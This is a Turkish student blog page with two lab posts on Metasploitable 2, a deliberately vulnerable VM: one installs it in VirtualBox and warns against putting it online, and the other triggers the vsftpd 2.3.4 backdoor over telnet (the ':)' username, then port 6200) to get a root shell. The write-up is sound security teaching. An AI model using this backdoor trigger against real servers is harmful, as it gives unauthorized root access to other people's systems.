metasploitable2 etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
metasploitable2 etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

12 Ekim 2016 Çarşamba

Metasploitable 2

Servisler : Backdoors (Arka Kapılar)

Bu yazımda kurulumunu anlattığım Metasploitable 2'nin, 21.portunda çalışan FTP sunucusunun
vsftpd programı ile ilgili bir şeyler karalayacağım.

Öncelikle Metasploitable2'ye login oluyoruz. Bize zaten Kullanıcı adı ve Parolamızı hatırlatıyor. :)















Daha sonra 

$ ifconfig komutu ile makinenin IP alıp almadığını kontrol ediyorum.















Kendi makinem ile aynı ağda olmasını istediğim için öncelikle kendi makinemdeki terminale gelerek:

$ ifconfig komutunu yazıyorum.
Ve vboxnet0'n IP adresinin 192.168.56.1 olduğunu görüyorum. Şimdi bende Metasploitable 2'yi kendi makinem ile aynı ağda olacak şekilde bir IP adresi atıyorum. 

Bunları yapabilmek için öncelikle süper kullanıcı(root) olmam gerek. Çünkü ifconfig komutu /sbin/ifconfig/ dizini altında bulunuyor ve /sbin/  dizininde normal kullanıcı iken ya da root iken işler farklı ilerliyor. Yapılandırma yapabilmek için root olmam gerekiyor.

# ifconfig eth0 192.168.56.42 netmask 255.255.255.0 up komutunu yazıyorum.

Sadece IP adresi atamam yetmiyor. Bir Yönlendirici adreside atamam gerek. Bunun için de:

# route add default gw 192.168.56.1 komutunu yazıyorum.







Daha sonra benim makinemle haberleşebiliyor muyum diye ping atıyorum yani bir ICMP paketi gönderiyorum.




















Sıra geldi kendi makinemde nmap ile tarama yaparak Metasploitable 2'nin portlarını ve o portlarda açık olan servisleri görmeye, kendi makinemin konsolunu açarak:

$ nmap 192.168.56.0/24 yazıyorum.

















 192.168.56.1 IP adresli kendi makinemi ve 192.168.56.42 IP adresli Metasploitable 2'ı gördü.
Şimdi kendi makinemde root olarak Telnet ile Metasploitable 2'de oturum açacağım.
Öncelikle Telnet Nedir dersek , bir makineye uzaktaki başka bir makineden bağlanmak için geliştirilen bir TCP/IP protokolü ve bu işi yapan programlara verilen isimdir.(vikipedi :) )

Telnet ile bir şeyler yapabilmek için kendi makinemde root oluyorum.

# telnet 192.168.56.42 21 (Metasploitable 2'nin 21.portunda çalışan serviste oturum açmaya çalışıyorum.)

Trying 192.168.56.42...
Connected to 192.168.56.42.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass invalid
^]
telnet> quit
Connection closed.

Burada koyu yazılanları biz yazıyoruz. Dipnot : Benim ilk denediğimde olmadı. Terminali kapattım ve yeniden açarak root olduktan sonra aynı komutu yazdım, bu sefer düzeldi.
Bu işlemi yaptığımızda karşı makinede yani Metasploitable 2'de 6200.port aktif hale geliyor. Başta taradığımızda sadece 6000. ve 6667.portlar açıktı.

# telnet 192.168.56.42 6200

       Trying 192.168.56.42...
Connected to 192.168.56.42.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)

Burada koyu yazılmış olan id; 'yi biz yazıyoruz. Ve görüldüğü gibi karşı taraftaki makinede yani Metasploitable 2'de root olarak, oturum açmış bulunmaktayız. :))

Bu işi daha iyi anlamak ve özümsemek için bu sayfaya bakabilirsiniz. Bilgisayar Ağları dersinden bugünlük bu kadar ile yetindik, umarım faydalı oluyordur. :))
Kolaylıklar diliyorum. :)
Gönderen zaman: 1 yorum:
Etiketler: , , , ,

Virtualbox Üzerine Metasploitable 2 Kurulumu


Metasploitable Nedir ?

    Metasploitable, hedef sistemlere sızma sırasında yapılan saldırılar için bir deneme, öğrenme ortamı olarak Metasploit tarafından oluşturulmuştur. Sistem bir çok zafiyet barındıran, Linux bir sanal makinadır. Virtualbox’a  kurulabilir.

Öncelikle buradan metasploitable-linux-2.0.0.zip paketini indirmeliyiz. İndirdikten sonra paketin indirildiği dizine:

$ cd İndirilenDizin/ ile geçiş yaparak. 
$ unzip metasploitable-linux-2.0.0.zip komutu ile paketi açıyoruz.










Daha sonra Virtualbox'ımızı açarak. New diyoruz. 




Ve aşağıdaki ekran görüntüsünde olduğu gibi Metasploitable kurulumuna başlıyoruz.

  
Metasploitable bir Linux dağıtımıdır.
Name yerine istediğinizi yazabilirsiniz.
Type ve Version ekran görüntüsünde olduğu gibi olmalıdır.
Next diyoruz.










Next diyoruz.














Şimdi ki aşamada ise "Use an existing virtual hard drive file" seçeneğini işaretleyip. Sağ kısımdan Metasploitable'n olduğu dizine gidip Metasploitable.vmdk'yi seçiyoruz ve Open dedikten sonra Create diyerek kuruluma devam ediyoruz.












Create demeden önce işlemleri yaptıktan sonra ki son görünüm aşağıdaki gibi olmalı.


Create dediğimizde kurulumumuz tamamlanmış oluyor.
Virtualbox üzerinden Start'a bastığımızda aşağıdaki şekilde makina açılır.

Login olmak için süperli bir şekilde kullanıcı adı ve parolamızı bize sunuyor Metasploitable :)
msfadmin/msfadmin 

Yalnız  Metasploitable  kullanırken 'i' harfi için  'ı' harfine basmamız gerekiyor, Unutmayalım. :)

******Bunu internete bağlı bir makineye, internete açık bir şekilde kurmamak gerek. Sadece kendi bilgisayarımızla haberleşecek şekilde kurmamız gerekir. Aman dikkat edelim. :)

Bunu da Virtualbox'ı açtıktan sonra File > Preferences > Network dedikten sonra Host-only Networks'e basıp. Artı'ya tıkladığımızda ayarlamış oluyoruz.















Şimdiden kolay gelsin :)

Gönderen zaman: Hiç yorum yok:
Etiketler: , ,
Kaydol: Kayıtlar (Atom)